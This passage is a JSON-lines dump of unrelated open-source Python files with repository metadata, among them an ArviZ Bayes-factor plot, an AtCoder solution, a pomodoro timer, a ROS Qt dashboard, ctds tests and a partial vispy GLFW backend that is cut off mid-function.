print(href_text)","repo_name":"Wardun-Islam/projects","sub_path":"PycharmProjects/Beautiful Soup/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":616,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"70309693814","text":"# Plotting and reporting Bayes Factor given idata, var name, prior distribution and reference value\n# pylint: disable=unbalanced-tuple-unpacking\nimport logging\n\nfrom numpy import interp\n\nfrom ..data.utils import extract\nfrom .plot_utils import get_plotting_function\nfrom ..stats.density_utils import _kde_linear\n\n_log = logging.getLogger(__name__)\n\n\ndef plot_bf(\n idata,\n var_name,\n prior=None,\n ref_val=0,\n colors=(\"C0\", \"C1\"),\n figsize=None,\n textsize=None,\n hist_kwargs=None,\n plot_kwargs=None,\n ax=None,\n backend=None,\n backend_kwargs=None,\n show=None,\n):\n r\"\"\"Approximated Bayes Factor for comparing hypothesis of two nested models.\n\n The Bayes factor is estimated by comparing a model (H1) against a model in which the\n parameter of interest has been restricted to be a point-null (H0). This computation\n assumes the models are nested and thus H0 is a special case of H1.\n\n Notes\n -----\n The bayes Factor is approximated as the Savage-Dickey density ratio\n algorithm presented in [1]_.\n\n Parameters\n -----------\n idata : InferenceData\n Any object that can be converted to an :class:`arviz.InferenceData` object\n Refer to documentation of :func:`arviz.convert_to_dataset` for details.\n var_name : str, optional\n Name of variable we want to test.\n prior : numpy.array, optional\n In case we want to use different prior, for example for sensitivity analysis.\n ref_val : int, default 0\n Point-null for Bayes factor estimation.\n colors : tuple, default ('C0', 'C1')\n Tuple of valid Matplotlib colors. First element for the prior, second for the posterior.\n figsize : (float, float), optional\n Figure size. If `None` it will be defined automatically.\n textsize: float, optional\n Text size scaling factor for labels, titles and lines. If `None` it will be auto\n scaled based on `figsize`.\n plot_kwargs : dicts, optional\n Additional keywords passed to :func:`matplotlib.pyplot.plot`.\n hist_kwargs : dicts, optional\n Additional keywords passed to :func:`arviz.plot_dist`. Only works for discrete variables.\n ax : axes, optional\n :class:`matplotlib.axes.Axes` or :class:`bokeh.plotting.Figure`.\n backend :{\"matplotlib\", \"bokeh\"}, default \"matplotlib\"\n Select plotting backend.\n backend_kwargs : dict, optional\n These are kwargs specific to the backend being used, passed to\n :func:`matplotlib.pyplot.subplots` or :class:`bokeh.plotting.figure`.\n For additional documentation check the plotting method of the backend.\n show : bool, optional\n Call backend show function.\n\n Returns\n -------\n dict : A dictionary with BF10 (Bayes Factor 10 (H1/H0 ratio), and BF01 (H0/H1 ratio).\n axes : matplotlib_axes or bokeh_figure\n\n References\n ----------\n .. [1] Heck, D., 2019. A caveat on the Savage-Dickey density ratio:\n The case of computing Bayes factors for regression parameters.\n\n Examples\n --------\n Moderate evidence indicating that the parameter \"a\" is different from zero.\n\n .. plot::\n :context: close-figs\n\n >>> import numpy as np\n >>> import arviz as az\n >>> idata = az.from_dict(posterior={\"a\":np.random.normal(1, 0.5, 5000)},\n ... 
prior={\"a\":np.random.normal(0, 1, 5000)})\n >>> az.plot_bf(idata, var_name=\"a\", ref_val=0)\n \"\"\"\n posterior = extract(idata, var_names=var_name).values\n\n if ref_val > posterior.max() or ref_val < posterior.min():\n _log.warning(\n \"The reference value is outside of the posterior. \"\n \"This translate into infinite support for H1, which is most likely an overstatement.\"\n )\n\n if posterior.ndim > 1:\n _log.warning(\"Posterior distribution has {posterior.ndim} dimensions\")\n\n if prior is None:\n prior = extract(idata, var_names=var_name, group=\"prior\").values\n\n if posterior.dtype.kind == \"f\":\n posterior_grid, posterior_pdf = _kde_linear(posterior)\n prior_grid, prior_pdf = _kde_linear(prior)\n posterior_at_ref_val = interp(ref_val, posterior_grid, posterior_pdf)\n prior_at_ref_val = interp(ref_val, prior_grid, prior_pdf)\n\n elif posterior.dtype.kind == \"i\":\n posterior_at_ref_val = (posterior == ref_val).mean()\n prior_at_ref_val = (prior == ref_val).mean()\n\n bf_10 = prior_at_ref_val / posterior_at_ref_val\n bf_01 = 1 / bf_10\n\n bfplot_kwargs = dict(\n ax=ax,\n bf_10=bf_10.item(),\n bf_01=bf_01.item(),\n prior=prior,\n posterior=posterior,\n ref_val=ref_val,\n prior_at_ref_val=prior_at_ref_val,\n posterior_at_ref_val=posterior_at_ref_val,\n var_name=var_name,\n colors=colors,\n figsize=figsize,\n textsize=textsize,\n hist_kwargs=hist_kwargs,\n plot_kwargs=plot_kwargs,\n backend_kwargs=backend_kwargs,\n show=show,\n )\n\n plot = get_plotting_function(\"plot_bf\", \"bfplot\", backend)\n axes = plot(**bfplot_kwargs)\n return {\"BF10\": bf_10, \"BF01\": bf_01}, axes\n","repo_name":"arviz-devs/arviz","sub_path":"arviz/plots/bfplot.py","file_name":"bfplot.py","file_ext":"py","file_size_in_byte":5121,"program_lang":"python","lang":"en","doc_type":"code","stars":1461,"dataset":"github-code","pt":"21"} +{"seq_id":"20727061022","text":"import io\nfrom operator import mod\nimport sys\n\n_INPUT = \"\"\"\\\n4 10\n1\n1\n3\n2 1\n1\n2 3\n3\n1\n2 2\n3\n\n\n\"\"\"\nsys.stdin = io.StringIO(_INPUT)\n\n# ---------------------------------\nn, q = map(int, input().split())\n\nnot_come = set()\nnot_call = list(range(n, 0, -1))\n\ncome_history = set()\n\nfor _ in range(q):\n event = input()\n\n if event.count(\" \") == 0:\n event = int(event)\n if event == 1:\n tmp = not_call.pop()\n not_come.add(tmp)\n elif event == 3:\n # not_come -= come_history\n\n for ans in not_come:\n print(ans)\n break\n\n else:\n event, person = map(int, event.split())\n come_history.add(person)\n not_come.discard(person)\n","repo_name":"makima333/Atcoder-ganbaru","sub_path":"contest/abc294/D.py","file_name":"D.py","file_ext":"py","file_size_in_byte":729,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"73084597812","text":"class stacks:\r\n s=[]\r\n def push(self):\r\n z=[]\r\n n=str(input(\"Enter Student's Name :- \"))\r\n c=str(input(\"Enter Student's Class And Section (Class in Roman Numbers): -\"))\r\n dob=input(\"Enter Student's Date Of Birth (dd/mm//yyyy)(enter slashes too):- \")\r\n z+=[n,c,dob]\r\n stacks.s.append(z)\r\n def display(self):\r\n l=len(stacks.s)\r\n for i in range(l-1,-1,-1):\r\n print (stacks.s[i])\r\n def peek(self):\r\n if (stacks.s==[]):\r\n print(\"stacks Empty\")\r\n else:\r\n print(\"Top Most's Student's Info :- \",stacks.s[-1])\r\na=stacks()\r\nc=\"y\"\r\nwhile(c==\"y\"):\r\n print (\"Enter 1. To PUSH \")\r\n print (\"Enter 2. To POP \")\r\n print (\"Enter 3. To PEEK \")\r\n print (\"Enter 4. 
To Display \")\r\n print(\"________________________________________________________________\")\r\n choice=int(input(\"Enter Your Choice :- \"))\r\n if (choice==1):\r\n a.push()\r\n elif (choice==2):\r\n if (a.s==[]):\r\n print (\"stacks Empty\")\r\n else:\r\n print (\"Deleted element is : \",a.s.pop())\r\n elif (choice==3):\r\n a.peek()\r\n elif (choice==4):\r\n a.display()\r\n else:\r\n print(\"Wrong Input\")\r\n c=input(\"If You Wanna Continue Enter 'y' :- \")\r\nif c!='y':\r\n print(\"Bye\")\r\n quit\r\n","repo_name":"edwardmasih/Python-School-Level","sub_path":"Class 12/Python Programs/Stacks & Queues/Info OF Student in stacks.py","file_name":"Info OF Student in stacks.py","file_ext":"py","file_size_in_byte":1326,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"2858356826","text":"# Doesn't work\nimport csv\nimport urllib2\nimport json\n\nurl = \"http://www.omdbapi.com/?t=Harry+Potter&r=json&tomatoes=true&type=movie\"\nresponse = urllib2.urlopen(url).read()\ndata = json.loads(response)\n\nfname = 'data.csv'\n\nwith open(fname,'wb') as outf:\n outcsv = csv.writer(outf)\n outcsv.writerows(data)\n","repo_name":"TheChu/books-to-movies","sub_path":"omdb.py","file_name":"omdb.py","file_ext":"py","file_size_in_byte":309,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"22771826777","text":"import tcxparser\nfrom datetime import datetime\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\n\nplt.xkcd()\n\n#filename = '/home/guancio/Sources/org-fit/data/activity_3016769645.tcx'\n#problems with output from runalyze\n#filename = '/home/guancio/Sources/org-fit/data/7982-Activity_2018-10-29_18-18_4714045.tcx'\n# filename = '/home/guancio/Sources/org-fit/activity_3029988752.tcx'\ntcx_filename = '/home/guancio/Sources/org-fit/data/activity_3129411144.tcx'\ntcx_filename = '/home/guancio/Sources/org-fit/data/activity_3129411414.tcx'\n\nlast_tcx = None\n\nvalue = \"hr\"\n\ndef reset_last():\n global last_tcx\n last_tcx = None\n\ndef parse_tcx(filename):\n global last_tcx\n if last_tcx is not None and last_tcx[\"filename\"] == filename:\n return last_tcx[\"tr\"]\n \n tcx = tcxparser.TCXParser(filename)\n train = {}\n train['activity_type'] = tcx.activity_type\n train['calories'] = tcx.calories\n train['distance_units'] = tcx.distance_units\n train['date'] = tcx.time_values()[0]\n tr = pd.DataFrame({ 'time': [], 'hr' : []})\n t1 = datetime.strptime(tcx.time_values()[0][:-1], \"%Y-%m-%dT%H:%M:%S.%f\")\n for i in range(min(len(tcx.time_values()), len(tcx.hr_values()))):\n t = (datetime.strptime(tcx.time_values()[i][:-1], \"%Y-%m-%dT%H:%M:%S.%f\") - t1).total_seconds()\n tr = tr.append({\"time\" : t,\n \"hr\": tcx.hr_values()[i]},\n ignore_index=True)\n tr[\"duration\"] = -tr[\"time\"].diff(periods=-1)\n last_tcx = {\"filename\": filename, \"tr\": tr}\n\ndef draw_line_graph(tcx_filename, value, filename):\n to_plot = parse_tcx(tcx_filename)\n if to_plot is None:\n return\n to_plot = to_plot.set_index('time')\n fig, ax = plt.subplots(nrows=1, ncols=1)\n ax.plot(to_plot[value])\n plt.legend()\n fig.savefig(filename)\n plt.close(fig)\n return filename\n\ndef draw_histogram(tcx_filename, value, filename):\n to_plot = parse_tcx(tcx_filename)\n if to_plot is None:\n return\n to_plot = to_plot.dropna()\n bins_hr = np.linspace(100, 180, 5) # number of bins in the histograms\n fig, ax = plt.subplots(nrows=1, ncols=1)\n ax.hist(to_plot[value], weights=to_plot[\"duration\"], 
bins=bins_hr)\n fig.savefig(filename)\n plt.close(fig)\n return filename\n","repo_name":"guancio/org-fit","sub_path":"cli/process_fit.py","file_name":"process_fit.py","file_ext":"py","file_size_in_byte":2289,"program_lang":"python","lang":"en","doc_type":"code","stars":76,"dataset":"github-code","pt":"21"} +{"seq_id":"30467319680","text":"from threading import Timer\nfrom pygame import mixer\nimport time\n\ntomato_count = 0\nstudy_count = 0\nrelax_count = 0\nt0 = Timer(0, None)\n#mixer.init()\n\ndef tomato_clk(msg, starttime):\n global tomato_count, study_count, relax_count, t0\n tomato_count += 1\n if tomato_count < 7:\n if tomato_count % 2 == 0:\n study_count += 1\n print(\"Time to study. <\", study_count, \"> (from tomato clock)\")\n mixer.music.load('sound/tomato_sound_1.mp3')\n mixer.music.play()\n t0 = Timer(16, tomato_clk, ('%d' % (tomato_count), time.time()))\n t0.start()\n else:\n relax_count += 1\n print(\"Time to relax. <\", relax_count, \"> (from tomato clock)\")\n mixer.music.load('sound/tomato_sound_2.mp3')\n mixer.music.play()\n t0 = Timer(14, tomato_clk, ('%d' % (tomato_count), time.time()))\n t0.start()\n elif tomato_count == 7:\n print(\"Tomato clock closed.\")\n mixer.music.load('sound/tomato_sound_3.mp3')\n mixer.music.play()\n \n\ndef start():\n global tomato_count, study_count, relax_count, t0\n tomato_count = 0\n study_count = 1\n relax_count = 0\n t0 = Timer(4, ready)\n t0.start()\n\ndef ready():\n global tomato_count, study_count, relax_count, t0\n print(\"Time to study. <\", study_count, \"> (from tomato clock)\")\n mixer.music.load('sound/tomato_sound_1.mp3')\n mixer.music.play()\n t0 = Timer(16, tomato_clk, ('%d' % (tomato_count), time.time()))\n t0.start()\n\ndef end():\n global t0\n t0.cancel()\n\n","repo_name":"shallwe999/AILP_Pi_source","sub_path":"tomato_clock.py","file_name":"tomato_clock.py","file_ext":"py","file_size_in_byte":1579,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"10600599155","text":"#!/usr/bin/env python\n#\n# License: BSD\n# https://raw.githubusercontent.com/stonier/py_trees/devel/LICENSE\n#\n##############################################################################\n# Documentation\n##############################################################################\n\n\"\"\"\nQt support for the tutorials.\n\"\"\"\n\n##############################################################################\n# Imports\n##############################################################################\n\nimport functools\nimport py_trees_ros\nimport rospy\nimport std_msgs.msg as std_msgs\nimport threading\n\nfrom python_qt_binding.QtCore import Signal, Qt, QTimer, Slot\nfrom python_qt_binding.QtWidgets import QWidget, QPushButton, QGridLayout, QSizePolicy, QLabel\n\n##############################################################################\n# Dashboard\n##############################################################################\n\n\nclass Dashboard(QWidget):\n\n _activate_button_led = Signal(bool)\n _stop_button_led = Signal(bool)\n\n def __init__(self):\n super(Dashboard, self).__init__()\n\n not_latched = False\n # latched = True\n self.publishers = py_trees_ros.utilities.Publishers(\n [\n ('activate', \"~active\", std_msgs.Bool, not_latched, 1),\n ('stop', \"~active\", std_msgs.Bool, not_latched, 1),\n ]\n )\n\n self.activate_push_button = QPushButton(\"Activate\")\n self.activate_push_button.setStyleSheet(\"QPushButton { font-size: 30pt; }\")\n 
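# let the button expand to fill its cell in the grid layout\n        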
self.activate_push_button.setSizePolicy(QSizePolicy.Expanding, QSizePolicy.Expanding)\n self.activate_push_button.pressed.connect(functools.partial(self.publish_button_message, self.publishers.activate, True))\n\n self.stop_push_button = QPushButton(\"Stop\")\n self.stop_push_button.setStyleSheet(\"QPushButton { font-size: 30pt; }\")\n self.stop_push_button.setSizePolicy(QSizePolicy.Expanding, QSizePolicy.Expanding)\n self.stop_push_button.pressed.connect(functools.partial(self.publish_button_message, self.publishers.stop, False))\n\n self.hbox_layout = QGridLayout(self)\n self.hbox_layout.addWidget(self.activate_push_button)\n self.hbox_layout.addWidget(self.stop_push_button)\n\n self.subscribers = py_trees_ros.utilities.Subscribers(\n [\n (\"report\", \"/tree/report\", std_msgs.String, self.reality_report_callback)\n ]\n )\n\n def publish_button_message(self, publisher, msg):\n publisher.publish(std_msgs.Bool(msg))\n\n def reality_report_callback(self, msg):\n if msg.data == False:\n self.set_activating_color(False)\n self.set_stopping_color(True)\n self.stop_push_button.setEnabled(True)\n elif msg.data == True:\n self.set_activating_color(True)\n self.set_stopping_color(False)\n self.stop_push_button.setEnabled(True)\n else:\n self.set_activating_color(True)\n self.set_stopping_color(False)\n\n def set_stopping_color(self, val):\n if val:\n self.stop_push_button.setStyleSheet(\"QPushButton { font-size: 30pt; background-color: red}\")\n else:\n self.stop_push_button.setStyleSheet(\"QPushButton { font-size: 30pt; }\")\n\n def set_activating_color(self, val):\n if val:\n self.activate_push_button.setStyleSheet(\"QPushButton { font-size: 30pt; background-color: green}\")\n else:\n self.activate_push_button.setStyleSheet(\"QPushButton { font-size: 30pt; }\")\n\n","repo_name":"pirobot/pi-kobuki-git","sub_path":"piko_tasks/src/piko_tasks/qt.py","file_name":"qt.py","file_ext":"py","file_size_in_byte":3574,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"18363051281","text":"import warnings\n\nimport ctds\n\nfrom .base import TestExternalDatabase\n\nclass TestCursorConnection(TestExternalDatabase):\n '''Unit tests related to the Cursor.connection attribute.\n '''\n\n def test___doc__(self):\n self.assertEqual(\n ctds.Cursor.connection.__doc__,\n '''\\\nA reference to the Connection object on which the cursor was created.\n\n:pep:`0249#id28`\n\n:rtype: ctds.Connection\n'''\n )\n\n def test_closed(self):\n with self.connect() as connection:\n cursor = connection.cursor()\n cursor.close()\n with warnings.catch_warnings(record=True) as warns:\n try:\n cursor.connection\n except ctds.InterfaceError:\n pass\n else:\n self.fail('.connection did not fail as expected') # pragma: nocover\n\n self.assertEqual(len(warns), 1)\n self.assertEqual(\n [str(warn.message) for warn in warns],\n ['DB-API extension cursor.connection used'] * len(warns)\n )\n\n def test_connection(self):\n with self.connect() as connection:\n with connection.cursor() as cursor:\n with warnings.catch_warnings(record=True) as warns:\n self.assertEqual(connection, cursor.connection)\n self.assertEqual(len(warns), 1)\n self.assertEqual(\n [str(warn.message) for warn in warns],\n ['DB-API extension cursor.connection used'] * len(warns)\n )\n\n # cursor.connection is read-only\n try:\n cursor.connection = None\n except AttributeError:\n pass\n else:\n self.fail('.connection did not fail as expected') # pragma: nocover\n\n def test_warning_as_error(self):\n with self.connect() as 
connection:\n with connection.cursor() as cursor:\n with warnings.catch_warnings():\n warnings.simplefilter('error')\n try:\n _ = cursor.connection\n except Warning as warn:\n self.assertEqual('DB-API extension cursor.connection used', str(warn))\n else:\n self.fail('.connection did not fail as expected') # pragma: nocover\n","repo_name":"zillow/ctds","sub_path":"tests/test_cursor_connection.py","file_name":"test_cursor_connection.py","file_ext":"py","file_size_in_byte":2500,"program_lang":"python","lang":"en","doc_type":"code","stars":81,"dataset":"github-code","pt":"21"} +{"seq_id":"73041597173","text":"from __future__ import division\n\nimport atexit\nfrom time import sleep\nimport gc\nimport os\n\nfrom ..base import (BaseApplicationBackend, BaseCanvasBackend,\n BaseTimerBackend)\nfrom ...util import keys, logger\nfrom ...util.ptime import time\nfrom ... import config\n\nUSE_EGL = config['gl_backend'].lower().startswith('es')\n\n\n# -------------------------------------------------------------------- init ---\n\ntry:\n from ...ext import glfw\n\n # Map native keys to vispy keys\n KEYMAP = {\n glfw.GLFW_KEY_LEFT_SHIFT: keys.SHIFT,\n glfw.GLFW_KEY_RIGHT_SHIFT: keys.SHIFT,\n glfw.GLFW_KEY_LEFT_CONTROL: keys.CONTROL,\n glfw.GLFW_KEY_RIGHT_CONTROL: keys.CONTROL,\n glfw.GLFW_KEY_LEFT_ALT: keys.ALT,\n glfw.GLFW_KEY_RIGHT_ALT: keys.ALT,\n glfw.GLFW_KEY_LEFT_SUPER: keys.META,\n glfw.GLFW_KEY_RIGHT_SUPER: keys.META,\n\n glfw.GLFW_KEY_LEFT: keys.LEFT,\n glfw.GLFW_KEY_UP: keys.UP,\n glfw.GLFW_KEY_RIGHT: keys.RIGHT,\n glfw.GLFW_KEY_DOWN: keys.DOWN,\n glfw.GLFW_KEY_PAGE_UP: keys.PAGEUP,\n glfw.GLFW_KEY_PAGE_DOWN: keys.PAGEDOWN,\n\n glfw.GLFW_KEY_INSERT: keys.INSERT,\n glfw.GLFW_KEY_DELETE: keys.DELETE,\n glfw.GLFW_KEY_HOME: keys.HOME,\n glfw.GLFW_KEY_END: keys.END,\n\n glfw.GLFW_KEY_ESCAPE: keys.ESCAPE,\n glfw.GLFW_KEY_BACKSPACE: keys.BACKSPACE,\n\n glfw.GLFW_KEY_F1: keys.F1,\n glfw.GLFW_KEY_F2: keys.F2,\n glfw.GLFW_KEY_F3: keys.F3,\n glfw.GLFW_KEY_F4: keys.F4,\n glfw.GLFW_KEY_F5: keys.F5,\n glfw.GLFW_KEY_F6: keys.F6,\n glfw.GLFW_KEY_F7: keys.F7,\n glfw.GLFW_KEY_F8: keys.F8,\n glfw.GLFW_KEY_F9: keys.F9,\n glfw.GLFW_KEY_F10: keys.F10,\n glfw.GLFW_KEY_F11: keys.F11,\n glfw.GLFW_KEY_F12: keys.F12,\n\n glfw.GLFW_KEY_SPACE: keys.SPACE,\n glfw.GLFW_KEY_ENTER: keys.ENTER,\n '\\r': keys.ENTER,\n glfw.GLFW_KEY_TAB: keys.TAB,\n }\n\n BUTTONMAP = {glfw.GLFW_MOUSE_BUTTON_LEFT: 1,\n glfw.GLFW_MOUSE_BUTTON_RIGHT: 2,\n glfw.GLFW_MOUSE_BUTTON_MIDDLE: 3\n }\nexcept Exception as exp:\n available, testable, why_not, which = False, False, str(exp), None\nelse:\n if USE_EGL:\n available, testable, why_not = False, False, 'EGL not supported'\n which = 'glfw ' + str(glfw.__version__)\n else:\n available, testable, why_not = True, True, None\n which = 'glfw ' + str(glfw.__version__)\n\nMOD_KEYS = [keys.SHIFT, keys.ALT, keys.CONTROL, keys.META]\n_GLFW_INITIALIZED = False\n_VP_GLFW_ALL_WINDOWS = []\n\n\ndef _get_glfw_windows():\n wins = list()\n for win in _VP_GLFW_ALL_WINDOWS:\n if isinstance(win, CanvasBackend):\n wins.append(win)\n return wins\n\n\n# -------------------------------------------------------------- capability ---\n\ncapability = dict( # things that can be set by the backend\n title=True,\n size=True,\n position=True,\n show=True,\n vsync=True,\n resizable=True,\n decorate=True,\n fullscreen=True,\n context=True,\n multi_window=True,\n scroll=True,\n parent=False,\n always_on_top=True,\n)\n\n\n# ------------------------------------------------------- set_configuration ---\n\ndef _set_config(c):\n \"\"\"Set gl 
configuration for GLFW \"\"\"\n glfw.glfwWindowHint(glfw.GLFW_RED_BITS, c['red_size'])\n glfw.glfwWindowHint(glfw.GLFW_GREEN_BITS, c['green_size'])\n glfw.glfwWindowHint(glfw.GLFW_BLUE_BITS, c['blue_size'])\n glfw.glfwWindowHint(glfw.GLFW_ALPHA_BITS, c['alpha_size'])\n\n glfw.glfwWindowHint(glfw.GLFW_ACCUM_RED_BITS, 0)\n glfw.glfwWindowHint(glfw.GLFW_ACCUM_GREEN_BITS, 0)\n glfw.glfwWindowHint(glfw.GLFW_ACCUM_BLUE_BITS, 0)\n glfw.glfwWindowHint(glfw.GLFW_ACCUM_ALPHA_BITS, 0)\n\n glfw.glfwWindowHint(glfw.GLFW_DEPTH_BITS, c['depth_size'])\n glfw.glfwWindowHint(glfw.GLFW_STENCIL_BITS, c['stencil_size'])\n # glfw.glfwWindowHint(glfw.GLFW_CONTEXT_VERSION_MAJOR, c['major_version'])\n # glfw.glfwWindowHint(glfw.GLFW_CONTEXT_VERSION_MINOR, c['minor_version'])\n # glfw.glfwWindowHint(glfw.GLFW_SRGB_CAPABLE, c['srgb'])\n glfw.glfwWindowHint(glfw.GLFW_SAMPLES, c['samples'])\n glfw.glfwWindowHint(glfw.GLFW_STEREO, c['stereo'])\n if not c['double_buffer']:\n raise RuntimeError('GLFW must double buffer, consider using a '\n 'different backend, or using double buffering')\n\n\n# ------------------------------------------------------------- application ---\n\n\n_glfw_errors = []\n\n\ndef _error_callback(num, descr):\n _glfw_errors.append('Error %s: %s' % (num, descr))\n\n\nclass ApplicationBackend(BaseApplicationBackend):\n\n def __init__(self):\n BaseApplicationBackend.__init__(self)\n self._timers = list()\n\n def _add_timer(self, timer):\n if timer not in self._timers:\n self._timers.append(timer)\n\n def _vispy_get_backend_name(self):\n return 'Glfw'\n\n def _vispy_process_events(self):\n glfw.glfwPollEvents()\n for timer in self._timers:\n timer._tick()\n wins = _get_glfw_windows()\n for win in wins:\n if win._needs_draw:\n win._needs_draw = False\n win._on_draw()\n\n def _vispy_run(self):\n wins = _get_glfw_windows()\n while any(w._id is not None and not glfw.glfwWindowShouldClose(w._id)\n for w in wins):\n self._vispy_process_events()\n self._vispy_quit() # to clean up\n\n def _vispy_quit(self):\n # Close windows\n wins = _get_glfw_windows()\n for win in wins:\n if win._vispy_canvas is not None:\n win._vispy_canvas.close()\n # tear down timers\n for timer in self._timers:\n timer._vispy_stop()\n self._timers = []\n\n def _vispy_get_native_app(self):\n global _GLFW_INITIALIZED\n if not _GLFW_INITIALIZED:\n cwd = os.getcwd()\n glfw.glfwSetErrorCallback(_error_callback)\n try:\n if not glfw.glfwInit(): # only ever call once\n raise OSError('Could not init glfw:\\n%r' % _glfw_errors)\n finally:\n os.chdir(cwd)\n glfw.glfwSetErrorCallback(0)\n atexit.register(glfw.glfwTerminate)\n _GLFW_INITIALIZED = True\n return glfw\n\n\n# ------------------------------------------------------------------ canvas ---\n\nclass CanvasBackend(BaseCanvasBackend):\n\n \"\"\" Glfw backend for Canvas abstract class.\"\"\"\n\n # args are for BaseCanvasBackend, kwargs are for us.\n def __init__(self, *args, **kwargs):\n BaseCanvasBackend.__init__(self, *args)\n p = self._process_backend_kwargs(kwargs)\n self._initialized = False\n\n # Deal with config\n _set_config(p.context.config)\n # Deal with context\n p.context.shared.add_ref('glfw', self)\n if p.context.shared.ref is self:\n share = None\n else:\n share = p.context.shared.ref._id\n\n glfw.glfwWindowHint(glfw.GLFW_REFRESH_RATE, 0) # highest possible\n glfw.glfwSwapInterval(1 if p.vsync else 0)\n glfw.glfwWindowHint(glfw.GLFW_RESIZABLE, int(p.resizable))\n glfw.glfwWindowHint(glfw.GLFW_DECORATED, int(p.decorate))\n glfw.glfwWindowHint(glfw.GLFW_VISIBLE, 0) # start out 
hidden\n glfw.glfwWindowHint(glfw.GLFW_FLOATING, int(p.always_on_top))\n if p.fullscreen is not False:\n self._fullscreen = True\n if p.fullscreen is True:\n monitor = glfw.glfwGetPrimaryMonitor()\n else:\n monitor = glfw.glfwGetMonitors()\n if p.fullscreen >= len(monitor):\n raise ValueError('fullscreen must be <= %s'\n % len(monitor))\n monitor = monitor[p.fullscreen]\n use_size = glfw.glfwGetVideoMode(monitor)[:2]\n if use_size != tuple(p.size):\n logger.debug('Requested size %s, will be ignored to '\n 'use fullscreen mode %s' % (p.size, use_size))\n size = use_size\n else:\n self._fullscreen = False\n monitor = None\n size = p.size\n\n self._id = glfw.glfwCreateWindow(width=size[0], height=size[1],\n title=p.title, monitor=monitor,\n share=share)\n if not self._id:\n raise RuntimeError('Could not create window')\n\n _VP_GLFW_ALL_WINDOWS.append(self)\n self._mod = list()\n\n # Register callbacks\n glfw.glfwSetWindowRefreshCallback(self._id, self._on_draw)\n glfw.glfwSetWindowSizeCallback(self._id, self._on_resize)\n glfw.glfwSetKeyCallback(self._id, self._on_key_press)\n glfw.glfwSetCharCallback(self._id, self._on_key_char)\n glfw.glfwSetMouseButtonCallback(self._id, self._on_mouse_button)\n glfw.glfwSetScrollCallback(self._id, self._on_mouse_scroll)\n glfw.glfwSetCursorPosCallback(self._id, self._on_mouse_motion)\n glfw.glfwSetWindowCloseCallback(self._id, self._on_close)\n self._vispy_canvas_ = None\n self._needs_draw = False\n self._vispy_canvas.set_current()\n if p.position is not None:\n self._vispy_set_position(*p.position)\n if p.show:\n glfw.glfwShowWindow(self._id)\n\n # Init\n self._initialized = True\n self._next_key_events = []\n self._next_key_text = {}\n self._vispy_canvas.set_current()\n self._vispy_canvas.events.initialize()\n\n def _vispy_warmup(self):\n etime = time() + 0.25\n while time() < etime:\n sleep(0.01)\n self._vispy_canvas.set_current()\n self._vispy_canvas.app.process_events()\n\n def _vispy_set_current(self):\n if self._id is None:\n return\n # Make this the current context\n glfw.glfwMakeContextCurrent(self._id)\n\n def _vispy_swap_buffers(self):\n if self._id is None:\n return\n # Swap front and back buffer\n glfw.glfwSwapBuffers(self._id)\n\n def _vispy_set_title(self, title):\n if self._id is None:\n return\n # Set the window title. Has no effect for widgets\n glfw.glfwSetWindowTitle(self._id, title)\n\n def _vispy_set_size(self, w, h):\n if self._id is None:\n return\n # Set size of the widget or window\n glfw.glfwSetWindowSize(self._id, w, h)\n\n def _vispy_set_position(self, x, y):\n if self._id is None:\n return\n # Set position of the widget or window. 
May have no effect for widgets\n glfw.glfwSetWindowPos(self._id, x, y)\n\n def _vispy_set_visible(self, visible):\n # Show or hide the window or widget\n if self._id is None:\n return\n if visible:\n glfw.glfwShowWindow(self._id)\n # this ensures that the show takes effect\n self._vispy_update()\n else:\n glfw.glfwHideWindow(self._id)\n\n def _vispy_set_fullscreen(self, fullscreen):\n logger.warn('Cannot change fullscreen mode for GLFW backend')\n\n def _vispy_update(self):\n # Invoke a redraw, passing it on to the canvas\n if self._vispy_canvas is None or self._id is None:\n return\n # Mark that this window wants to be drawn on the next loop iter\n self._needs_draw = True\n\n def _vispy_close(self):\n # Force the window or widget to shut down\n if self._id is not None:\n self._vispy_canvas = None\n # glfw.glfwSetWindowShouldClose() # Does not really cause a close\n self._vispy_set_visible(False)\n self._id, id_ = None, self._id\n glfw.glfwDestroyWindow(id_)\n gc.collect() # help ensure context gets destroyed\n\n def _vispy_get_size(self):\n if self._id is None:\n return\n w, h = glfw.glfwGetWindowSize(self._id)\n return w, h\n\n def _vispy_get_physical_size(self):\n if self._id is None:\n return\n w, h = glfw.glfwGetFramebufferSize(self._id)\n return w, h\n\n def _vispy_get_position(self):\n if self._id is None:\n return\n x, y = glfw.glfwGetWindowPos(self._id)\n return x, y\n\n def _vispy_get_fullscreen(self):\n return self._fullscreen\n\n ##########################################\n # Notify vispy of events triggered by GLFW\n def _on_resize(self, _id, w, h):\n if self._vispy_canvas is None:\n return\n self._vispy_canvas.events.resize(\n size=(w, h), physical_size=self._vispy_get_physical_size())\n\n def _on_close(self, _id):\n if self._vispy_canvas is None:\n return\n self._vispy_canvas.close()\n\n def _on_draw(self, _id=None):\n if self._vispy_canvas is None or self._id is None:\n return\n self._vispy_canvas.set_current()\n self._vispy_canvas.events.draw(region=None) # (0, 0, w, h))\n\n def _on_mouse_button(self, _id, button, action, mod):\n if self._vispy_canvas is None and self._id is not None:\n return\n pos = glfw.glfwGetCursorPos(self._id)\n if button < 3:\n # Mouse click event\n button = BUTTONMAP.get(button, 0)\n if action == glfw.GLFW_PRESS:\n fun = self._vispy_mouse_press\n elif action == glfw.GLFW_RELEASE:\n fun = self._vispy_mouse_release\n else:\n return\n fun(pos=pos, button=button, modifiers=self._mod)\n\n def _on_mouse_scroll(self, _id, x_off, y_off):\n if self._vispy_canvas is None and self._id is not None:\n return\n pos = glfw.glfwGetCursorPos(self._id)\n delta = (float(x_off), float(y_off))\n self._vispy_canvas.events.mouse_wheel(pos=pos, delta=delta,\n modifiers=self._mod)\n\n def _on_mouse_motion(self, _id, x, y):\n if self._vispy_canvas is None:\n return\n 